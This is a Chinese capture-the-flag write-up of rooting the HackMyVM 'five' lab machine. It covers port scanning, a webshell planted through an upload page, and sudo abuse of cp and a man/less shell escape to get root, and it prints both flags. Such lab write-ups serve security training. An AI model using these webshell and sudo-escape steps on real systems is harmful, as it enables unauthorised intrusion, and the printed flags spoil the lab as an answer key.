hackmyvm-five
扫描结果
λzscan -t 192.168.69.16-192.169.69.40 -p 1-65535
[ ]2025/03/09 22:21:05 本次扫描用户屏蔽的端口:[25 110 9100 9101 9102 9103]Tips: 可以使用--check参数,对给定的ip:port,protocol://ipport/path等字符串进行检测,且不会进行端口扫描[+]2025/03/09 22:21:05 当前环境为:windows, 输出编码为:utf-8[+]2025/03/09 22:21:05 hydra模块已开启,开始监听暴力破解任务[ ]2025/03/09 22:21:05 当前已开启的hydra模块为:[ssh rdp ftp smb telnet mysql mssql oracle postgresql mongodb redis] [+]2025/03/09 22:21:06 成功加载HTTP指纹:[26553]条 [+]2025/03/09 22:21:06 成功加载NMAP探针:[150]个,指纹[11916]条 [ ]2025/03/09 22:21:06 未检测到qqwry.dat,将关闭CDN检测功能,如需开启,请执行kscan --download-qqwry下载该文件[+]2025/03/09 22:21:07 Domain、IP、Port、URL、Hydra引擎已准备就绪http://192.168.69.18 403Forbidden Port:80,Digest:<bodybgcolor="white">,Length:279[ ] WebTitle http://192.168.69.18 code:403 len:169 title:403 Forbidden [debug]主路径扫描结果 [http://192.168.69.18]
80端口扫描路径有个robots.txt
Disallow:/admin
还扫出来upload.html,可以上传目录
uploads不能够访问,改上传到admin/去
直接连上antsword,然后反弹shell
登录先看suid提权,发现有个more可以提权,但是没权限执行
再看下sudo -l
发现有个/bin/cp
www-data@five:/html/admin$ sudo -u melisa /bin/cp /home/melisa/*
/tmpsudo -u melisa /bin/cp /home/melisa/* /tmp
www-data@five:/html/admin$
看了下ssh开在127.0.0.1:4444上
可以生成一个key给melisa
成功提权到melisa,获得user.txt-Ilovebinaries
继续看看sudo -l
查了下man可以提权
sudo /bin/man -P /usr/bin/less /bin/man !/bin/sh
成功拿下root.txt - WTFGivemefive
melisa@five:~$ sudo /bin/man -P /usr/bin/less /bin/man sudo /bin/man -P /usr/bin/less /bin/man WARNING: terminal is not fully functional
-
(press RETURN)!/bin/bash !//bbiinn//bbaasshh!/bin/bash root@five:/home/melisa# ls ls user.txt root@five:/home/melisa# cd ~ cd ~ root@five:# lslsroot.txtroot@five:# cat root.txt cat root.txt WTFGivemefive root@five:~#
摘要
-
扫描结果:
-
扫描IP范围:192.168.69.16-192.169.69.40 -
屏蔽端口:25, 110, 9100-9103 -
当前环境:Windows,输出编码:UTF-8 -
开启的Hydra模块:SSH, RDP, FTP, SMB, Telnet, MySQL, MSSQL, Oracle, PostgreSQL, MongoDB, Redis -
HTTP指纹加载成功:26553条 -
NMAP探针加载成功:150个,指纹11916条 -
未检测到qqwry.dat,关闭CDN检测功能 -
80端口扫描结果:
-
路径: http://192.168.69.18:80
,返回403 Forbidden -
发现 robots.txt
文件,内容:Disallow:/admin
-
发现 upload.html
,可以上传文件到admin/
目录 -
提权过程:
-
使用 antsword
连接并反弹shell -
检查SUID提权,发现 more
可提权但无权限执行 -
检查 sudo -l
,发现可以以melisa
用户身份执行/bin/cp
-
生成SSH密钥并成功提权到 melisa
,获得user.txt
内容:Ilovebinaries
-
进一步检查 sudo -l
,发现man
命令可提权 -
使用 man
命令提权成功,获得root.txt
内容:WTFGivemefive
-
最终结果:
-
成功提权至 root
用户,获取系统完全控制权。
原文始发于微信公众号(BlueIris):hackmyvm-five
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论